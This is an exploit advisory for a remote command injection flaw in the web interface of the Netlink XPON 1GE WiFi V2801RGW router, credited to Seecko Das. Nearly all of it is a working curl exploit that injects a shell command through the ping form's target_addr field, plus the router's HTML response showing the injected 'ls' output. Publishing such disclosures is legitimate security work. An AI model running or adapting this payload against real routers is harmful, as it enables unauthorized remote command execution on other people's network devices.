Netlink XPON 1GE WiFi V2801RGW Remote Command Execution

2020.05.17
Credit: Seecko Das
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution
# Google Dork: Not applicable
# Date: 2020-05-13
# Exploit Author: Seecko Das
# Vendor Homepage: https://www.crtindia.com/
# Version: V3.3.0-190627
# Tested on: Windows 10/Linux (Kali)
# CVE: N/A

Exploit :

curl -L -d "target_addr=1.1.1.1+%7C+ls&waninf=1_INTERNET_R_VID_168" http://IPADDRESS/boaform/admin/formPing

Response :

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--系统默认模板-->
<html>
<head>
<title>PING测试结果</title>
<meta http-equiv=pragma content=no-cache>
<meta http-equiv=refresh content="2">
<meta http-equiv=cache-control content="no-cache, must-revalidate">
<meta http-equiv=content-type content="text/html; charset=gbk">
<meta http-equiv=content-script-type content=text/javascript>
<!--系统公共css-->
<style type=text/css>
@import url(/style/default.css);
</style>
<!--系统公共脚本-->
<script language="javascript" src="common.js"></script>
</head>
<!-------------------------------------------------------------------------------------->
<!--主页代码-->
<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" alink="#000000" link="#000000" vlink="#000000">
<blockquote>
<form>
<div align="left" style="padding-left:20px;"><br>
<div align="left"><b>Please wait</b>
<br><br>
</div>
<pre>
boa.conf
web
</pre>
<input type=button value="back" onClick=window.location.replace("/diag_ping_admin.asp")>
</div>
</form>
</blockquote>
</body>
</html>

